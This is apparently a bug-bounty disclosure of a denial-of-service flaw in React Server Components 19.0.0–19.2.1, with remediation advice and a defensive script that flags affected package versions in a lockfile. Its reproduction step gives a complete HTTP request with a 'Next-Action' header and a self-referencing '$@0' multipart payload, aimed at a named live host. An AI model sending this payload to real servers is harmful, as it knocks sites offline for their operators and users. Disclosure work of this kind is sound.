Hello,
React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process with a single HTTP request.
Steps to reproduce:
- Please send the following request:
POST / HTTP/1.1
Host: yoki.astar.network
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: 151
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="0"
"$@0"
-----------------------------735323031399963166993862150--
Proof of concept:
Remediation:
- Update to the latest version that fixes the unsafe deserialization issue.
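As an added check (not part of this report), a script that flags installs of the three named packages whose version falls in the reported range 19.0.0 to 19.2.1; it assumes a package-lock.json-style "packages" map (sample constructed inline), and since the report does not name the fixed version it flags only the reported range.

```javascript
// Added example, not from the report: flag react-server-dom-* packages whose
// installed version is within the reported affected range 19.0.0 .. 19.2.1.
// Assumes a package-lock.json (v2/v3) "packages" object keyed "node_modules/<name>".

const AFFECTED_PACKAGES = [
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
  "react-server-dom-webpack",
];
const RANGE_MIN = "19.0.0";
const RANGE_MAX = "19.2.1"; // inclusive, as stated in the report

// Parse "MAJOR.MINOR.PATCH[-prerelease]"; returns null for anything else.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(String(v));
  if (!m) return null;
  return { parts: [Number(m[1]), Number(m[2]), Number(m[3])], pre: m[4] || null };
}

// Numeric comparison of MAJOR.MINOR.PATCH only; returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa.parts[i] !== pb.parts[i]) return pa.parts[i] < pb.parts[i] ? -1 : 1;
  }
  return 0;
}

// True when the numeric part lies in [RANGE_MIN, RANGE_MAX]. Prerelease tags
// (e.g. canary builds) are deliberately flagged too, a conservative choice.
function isAffected(version) {
  if (!parseVersion(version)) return false;
  return compareVersions(version, RANGE_MIN) >= 0 && compareVersions(version, RANGE_MAX) <= 0;
}

// Walk the lockfile map, including nested node_modules paths.
function findAffected(lockPackages) {
  const hits = [];
  for (const [path, info] of Object.entries(lockPackages)) {
    const name = path.replace(/^.*node_modules\//, "");
    if (AFFECTED_PACKAGES.includes(name) && info && isAffected(info.version)) {
      hits.push({ path, name, version: info.version });
    }
  }
  return hits;
}

// Constructed sample lockfile fragment (not a real project).
const SAMPLE_LOCK = {
  "node_modules/react": { version: "19.2.1" },
  "node_modules/react-server-dom-webpack": { version: "19.2.0" },
  "node_modules/react-server-dom-turbopack": { version: "19.2.2" },
  "node_modules/some-lib/node_modules/react-server-dom-parcel": { version: "19.0.0-canary-abc" },
};
console.log(findAffected(SAMPLE_LOCK));
```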
Reference:
Impact:
Unauthenticated attackers can cause denial of service by hanging the server process with a single HTTP request.
Thanks and have a good day!